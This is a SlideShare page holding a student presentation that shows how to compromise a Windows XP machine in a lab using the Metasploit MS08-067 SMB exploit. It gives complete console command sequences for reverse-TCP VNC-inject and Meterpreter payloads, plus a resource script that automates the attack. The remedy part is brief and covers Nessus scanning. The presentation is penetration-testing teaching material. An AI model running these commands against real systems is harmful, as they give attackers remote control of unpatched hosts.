SlideShare a Scribd company logo
1 of 11
Compromising windows
XP and Remedies
Bikrant Gautam, MSIA
St. Cloud State University
Overview
✘ Terminologies explained
✘ Deploying attack
✘ Automating attacks
✘ Mitigating measures
✘ Conclusion
Methodology Overview
● Probe target
● Find vulnerabilities
● Pass information to
exploit
● Find target
● Find Vulnerability
● Load Exploit
● Load Payload
● Setup Listener
● Exploit
Scanning
Attacking
Targeting Victims
The victim, name: bikrant1 ip: 192.168.1.9 The Attacker, target- vulnerable
Launching the Attack (visual)
Result ===>
Victim OS
everything user
does on this
computer is
visible to the
attacker once the
exploit is
successful
Attacking
System
Everything victim
does is seen from
Kali Linux using
TightVNC console.Exploit Code:
> sudo msfconsole
> use exploit/windows/smb/ms08_067_netapi
> set target 0
> set rhost 192.168.1.9
> set lhost 192.168.1.6
> set lport 4321
> set payload windows/vncinject/reverse_tcp
> check
> exploit
Attack continued(console)
Using MeterPreter
Exploit Script
> sudo msfconsole
> use exploit/windows/smb/ms08_067_netapi
> set target 0
> set rhost 192.168.1.9
> set lhost 192.168.1.6
> set lport 4321
> set payload
windows/meterpreter/reverse_tcp
> check
> exploit
● Different than previous one
● Has access to the command line
● Can create/delete or even execute new
scripts or command
Automating the Attack
Using bash script to automate the attacks
requirement:
> script needs to be created at specific folder of
metasploit framework.
> script once written can be invoked with
msfconsole command.
-----------------------------------------------------------------
> go to location: usr/share/metasploit-
framework/scripts/meterpreter
> create a file meterpreter.rc using nano or touch
> include the following script:
use exploit/windows/smb/ms08_067_netapi
set target 0
set rhost 192.168.1.9
set lhost 192.168.1.10
set lport 4321
set payload windows/vncinject/reverse_tcp
exploit
Automating the Attack (2)
Using python to automate attack
complex requirement:
> need to download correct library to initiate attack.
> package is msfrpc from github
> execute similar action as from bash scripting
-----------------------------------------------------------------
Difference from Bash Script:
> Difficult to implement.
> Depends on python version.
> Code cannot be run in other system
without setting up complete environment.
Initializing the attack
Preventing the Attack
Scanning for Vulnerabilities using Nessus
> scan the device (provide IP to Nessus)
> run the scan
> drill down on the critical and high
vulnerabilities
> read the description and adopt the solution
suggested
Conclusion
● Security is evolving process.
● New vulnerabilities are introduced each day
● Penetration and scanning helps you see what’s wrong
with your system
● Helps you understand what can be done once the
exploit is executed
● “Best defense can only be implemented once you know
your weakest point”
Questions?

More Related Content

What's hot

Hacktivity2014: Virtual Machine Introspection to Detect and Protect
Hacktivity2014: Virtual Machine Introspection to Detect and ProtectHacktivity2014: Virtual Machine Introspection to Detect and Protect
Hacktivity2014: Virtual Machine Introspection to Detect and ProtectTamas K Lengyel
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareTamas K Lengyel
 
ClusterDesktop manual how-to use for windows clients
ClusterDesktop manual how-to use for windows clientsClusterDesktop manual how-to use for windows clients
ClusterDesktop manual how-to use for windows clientsEmil Parashkevov
 
3 manual installation of open vpn
3 manual installation of open vpn3 manual installation of open vpn
3 manual installation of open vpnAshwajit Maske
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesTrowalts
 
Asus WL500gP USB Serial
Asus WL500gP USB SerialAsus WL500gP USB Serial
Asus WL500gP USB Serialguestac21b8
 
Installing TP-Link PS310U V2 on Windows 10
Installing TP-Link PS310U V2 on Windows 10Installing TP-Link PS310U V2 on Windows 10
Installing TP-Link PS310U V2 on Windows 10ASTRAPAY
 
Install zpanel on linux server in 5 minutes
Install zpanel on linux server in 5 minutesInstall zpanel on linux server in 5 minutes
Install zpanel on linux server in 5 minutesSamuel Guebo
 
Direction of building ns2 using cygwin under windows system
Direction of building ns2 using cygwin under windows systemDirection of building ns2 using cygwin under windows system
Direction of building ns2 using cygwin under windows systemyahyaoui hamdi
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Frameworkegypt
 
Qubes OS and TPM 2.0
Qubes OS and TPM 2.0Qubes OS and TPM 2.0
Qubes OS and TPM 2.0Piotr Król
 
ClusterDesktop manual how-to use for windows clients
ClusterDesktop manual how-to use for windows clientsClusterDesktop manual how-to use for windows clients
ClusterDesktop manual how-to use for windows clientsEmil Parashkevov
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemTamas K Lengyel
 
Virtual Machine Introspection in a Hyberid Honeypot Architecture
Virtual Machine Introspection in a Hyberid Honeypot ArchitectureVirtual Machine Introspection in a Hyberid Honeypot Architecture
Virtual Machine Introspection in a Hyberid Honeypot ArchitectureTamas K Lengyel
 
Pitfalls of virtual machine introspection on modern hardware
Pitfalls of virtual machine introspection on modern hardwarePitfalls of virtual machine introspection on modern hardware
Pitfalls of virtual machine introspection on modern hardwareTamas K Lengyel
 
Vagrant勉強会 チュートリアル編
Vagrant勉強会 チュートリアル編Vagrant勉強会 チュートリアル編
Vagrant勉強会 チュートリアル編Yasuyuki Sugai
 

What's hot (20)

Hacktivity2014: Virtual Machine Introspection to Detect and Protect
Hacktivity2014: Virtual Machine Introspection to Detect and ProtectHacktivity2014: Virtual Machine Introspection to Detect and Protect
Hacktivity2014: Virtual Machine Introspection to Detect and Protect
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardware
 
ClusterDesktop manual how-to use for windows clients
ClusterDesktop manual how-to use for windows clientsClusterDesktop manual how-to use for windows clients
ClusterDesktop manual how-to use for windows clients
 
Winsock
WinsockWinsock
Winsock
 
3 manual installation of open vpn
3 manual installation of open vpn3 manual installation of open vpn
3 manual installation of open vpn
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
 
Asus WL500gP USB Serial
Asus WL500gP USB SerialAsus WL500gP USB Serial
Asus WL500gP USB Serial
 
Installing TP-Link PS310U V2 on Windows 10
Installing TP-Link PS310U V2 on Windows 10Installing TP-Link PS310U V2 on Windows 10
Installing TP-Link PS310U V2 on Windows 10
 
Install zpanel on linux server in 5 minutes
Install zpanel on linux server in 5 minutesInstall zpanel on linux server in 5 minutes
Install zpanel on linux server in 5 minutes
 
Direction of building ns2 using cygwin under windows system
Direction of building ns2 using cygwin under windows systemDirection of building ns2 using cygwin under windows system
Direction of building ns2 using cygwin under windows system
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
 
Qubes OS and TPM 2.0
Qubes OS and TPM 2.0Qubes OS and TPM 2.0
Qubes OS and TPM 2.0
 
ClusterDesktop manual how-to use for windows clients
ClusterDesktop manual how-to use for windows clientsClusterDesktop manual how-to use for windows clients
ClusterDesktop manual how-to use for windows clients
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
 
Virtual Machine Introspection in a Hyberid Honeypot Architecture
Virtual Machine Introspection in a Hyberid Honeypot ArchitectureVirtual Machine Introspection in a Hyberid Honeypot Architecture
Virtual Machine Introspection in a Hyberid Honeypot Architecture
 
Ns-2.35 Installation
Ns-2.35 InstallationNs-2.35 Installation
Ns-2.35 Installation
 
Hack 01
Hack 01Hack 01
Hack 01
 
Pitfalls of virtual machine introspection on modern hardware
Pitfalls of virtual machine introspection on modern hardwarePitfalls of virtual machine introspection on modern hardware
Pitfalls of virtual machine introspection on modern hardware
 
Vagrant勉強会 チュートリアル編
Vagrant勉強会 チュートリアル編Vagrant勉強会 チュートリアル編
Vagrant勉強会 チュートリアル編
 

Viewers also liked

Log management principle and usage
Log management principle and usageLog management principle and usage
Log management principle and usageBikrant Gautam
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
SPICEonline
SPICEonlineSPICEonline
SPICEonlineuzee85
 
Supporting learners with engaging online resources
Supporting learners with engaging online resourcesSupporting learners with engaging online resources
Supporting learners with engaging online resourcesuzee85
 
Personal Learning Networks: Digital Education
Personal Learning Networks: Digital EducationPersonal Learning Networks: Digital Education
Personal Learning Networks: Digital Educationburtoh
 
Statistical database, problems and mitigation
Statistical database, problems and mitigationStatistical database, problems and mitigation
Statistical database, problems and mitigationBikrant Gautam
 
E-Learning trends & issues
E-Learning trends & issuesE-Learning trends & issues
E-Learning trends & issuesuzee85
 
Marketing lesbijek i gejów
Marketing lesbijek i gejówMarketing lesbijek i gejów
Marketing lesbijek i gejówMonika Czaplicka
 
cyiza_rwanda_economic_recovery_plan_mw_2012
cyiza_rwanda_economic_recovery_plan_mw_2012cyiza_rwanda_economic_recovery_plan_mw_2012
cyiza_rwanda_economic_recovery_plan_mw_2012Cyiza Rwanda
 
Cyber warfare an architecture for deterrence
Cyber warfare an architecture for deterrenceCyber warfare an architecture for deterrence
Cyber warfare an architecture for deterrenceBikrant Gautam
 
Measuring Communications Impact at EPRC
Measuring Communications Impact at EPRC Measuring Communications Impact at EPRC
Measuring Communications Impact at EPRC Research to Action
 
The Impact Log: A Communications Monitoring Tool
The Impact Log: A Communications Monitoring ToolThe Impact Log: A Communications Monitoring Tool
The Impact Log: A Communications Monitoring ToolResearch to Action
 
Crawl & analyse de logs SEO - SEOcampus 2013
Crawl & analyse de logs SEO - SEOcampus 2013Crawl & analyse de logs SEO - SEOcampus 2013
Crawl & analyse de logs SEO - SEOcampus 2013Jean-Benoît Moingt
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemBikrant Gautam
 
Vanksen : SEO et refonte de sites, les bonnes pratiques
Vanksen : SEO et refonte de sites, les bonnes pratiquesVanksen : SEO et refonte de sites, les bonnes pratiques
Vanksen : SEO et refonte de sites, les bonnes pratiquesVanksen
 
Network intrusion detection system and analysis
Network intrusion detection system and analysisNetwork intrusion detection system and analysis
Network intrusion detection system and analysisBikrant Gautam
 
Log File Analysis: The most powerful tool in your SEO toolkit
Log File Analysis: The most powerful tool in your SEO toolkitLog File Analysis: The most powerful tool in your SEO toolkit
Log File Analysis: The most powerful tool in your SEO toolkitTom Bennet
 

Viewers also liked (20)

Log management principle and usage
Log management principle and usageLog management principle and usage
Log management principle and usage
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
SPICEonline
SPICEonlineSPICEonline
SPICEonline
 
CARE Merlin Presentation
CARE Merlin PresentationCARE Merlin Presentation
CARE Merlin Presentation
 
Supporting learners with engaging online resources
Supporting learners with engaging online resourcesSupporting learners with engaging online resources
Supporting learners with engaging online resources
 
Personal Learning Networks: Digital Education
Personal Learning Networks: Digital EducationPersonal Learning Networks: Digital Education
Personal Learning Networks: Digital Education
 
Statistical database, problems and mitigation
Statistical database, problems and mitigationStatistical database, problems and mitigation
Statistical database, problems and mitigation
 
E-Learning trends & issues
E-Learning trends & issuesE-Learning trends & issues
E-Learning trends & issues
 
Marketing lesbijek i gejów
Marketing lesbijek i gejówMarketing lesbijek i gejów
Marketing lesbijek i gejów
 
TS55 Jen Weeks
TS55 Jen WeeksTS55 Jen Weeks
TS55 Jen Weeks
 
cyiza_rwanda_economic_recovery_plan_mw_2012
cyiza_rwanda_economic_recovery_plan_mw_2012cyiza_rwanda_economic_recovery_plan_mw_2012
cyiza_rwanda_economic_recovery_plan_mw_2012
 
Cyber warfare an architecture for deterrence
Cyber warfare an architecture for deterrenceCyber warfare an architecture for deterrence
Cyber warfare an architecture for deterrence
 
Measuring Communications Impact at EPRC
Measuring Communications Impact at EPRC Measuring Communications Impact at EPRC
Measuring Communications Impact at EPRC
 
The Impact Log: A Communications Monitoring Tool
The Impact Log: A Communications Monitoring ToolThe Impact Log: A Communications Monitoring Tool
The Impact Log: A Communications Monitoring Tool
 
Crawl & analyse de logs SEO - SEOcampus 2013
Crawl & analyse de logs SEO - SEOcampus 2013Crawl & analyse de logs SEO - SEOcampus 2013
Crawl & analyse de logs SEO - SEOcampus 2013
 
Penetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection SystemPenetration Testing and Intrusion Detection System
Penetration Testing and Intrusion Detection System
 
Vanksen : SEO et refonte de sites, les bonnes pratiques
Vanksen : SEO et refonte de sites, les bonnes pratiquesVanksen : SEO et refonte de sites, les bonnes pratiques
Vanksen : SEO et refonte de sites, les bonnes pratiques
 
Network intrusion detection system and analysis
Network intrusion detection system and analysisNetwork intrusion detection system and analysis
Network intrusion detection system and analysis
 
Log File Analysis: The most powerful tool in your SEO toolkit
Log File Analysis: The most powerful tool in your SEO toolkitLog File Analysis: The most powerful tool in your SEO toolkit
Log File Analysis: The most powerful tool in your SEO toolkit
 
Review
ReviewReview
Review
 

Similar to Windows xp compromise and remedies

Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
Client side exploits
Client side exploitsClient side exploits
Client side exploitsnickyt8
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionVishal Kumar
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux EnvironmentEnrico Scapin
 
Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Eric Romang
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernelLeak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernelJinbumPark
 
Please complete and post the screenshots here- I can be reached at pra.pdf
Please complete and post the screenshots here- I can be reached at pra.pdfPlease complete and post the screenshots here- I can be reached at pra.pdf
Please complete and post the screenshots here- I can be reached at pra.pdfIan5L3Allanm
 
Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBakry3
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisAnne Nicolas
 
Stealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware AnalysisStealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware AnalysisTamas K Lengyel
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 

Similar to Windows xp compromise and remedies (20)

Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testing
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC SessionExploiting Client-Side Vulnerabilities and Establishing a VNC Session
Exploiting Client-Side Vulnerabilities and Establishing a VNC Session
 
Exploiting Llinux Environment
Exploiting Llinux EnvironmentExploiting Llinux Environment
Exploiting Llinux Environment
 
Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentation
 
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernelLeak kernel pointer by exploiting uninitialized uses in Linux kernel
Leak kernel pointer by exploiting uninitialized uses in Linux kernel
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginner
 
Please complete and post the screenshots here- I can be reached at pra.pdf
Please complete and post the screenshots here- I can be reached at pra.pdfPlease complete and post the screenshots here- I can be reached at pra.pdf
Please complete and post the screenshots here- I can be reached at pra.pdf
 
Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slides
 
Native Hadoop with prebuilt spark
Native Hadoop with prebuilt sparkNative Hadoop with prebuilt spark
Native Hadoop with prebuilt spark
 
Kernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysisKernel Recipes 2015 - Kernel dump analysis
Kernel Recipes 2015 - Kernel dump analysis
 
Stealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware AnalysisStealthy, Hypervisor-based Malware Analysis
Stealthy, Hypervisor-based Malware Analysis
 
MPI
MPIMPI
MPI
 
Backtrack Manual Part7
Backtrack Manual Part7Backtrack Manual Part7
Backtrack Manual Part7
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS)        In t.docxLab-10 Malware Creation and Denial of Service (DoS)        In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 

Recently uploaded

Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesPhilip Schwarz
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfPower Karaoke
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....kzayra69
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfAlina Yurenko
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackVICTOR MAESTRE RAMIREZ
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)jennyeacort
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...Christina Lin
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 

Recently uploaded (20)

Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a series
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - Infographic
 
The Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdfThe Evolution of Karaoke From Analog to App.pdf
The Evolution of Karaoke From Analog to App.pdf
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need It
 
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
ODSC - Batch to Stream workshop - integration of Apache Spark, Cassandra, Pos...
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 

Windows xp compromise and remedies

  • 1. Compromising windows XP and Remedies Bikrant Gautam, MSIA St. Cloud State University
  • 2. Overview ✘ Terminologies explained ✘ Deploying attack ✘ Automating attacks ✘ Mitigating measures ✘ Conclusion
  • 3. Methodology Overview ● Probe target ● Find vulnerabilities ● Pass information to exploit ● Find target ● Find Vulnerability ● Load Exploit ● Load Payload ● Setup Listener ● Exploit Scanning Attacking
  • 4. Targeting Victims The victim, name: bikrant1 ip: 192.168.1.9 The Attacker, target- vulnerable
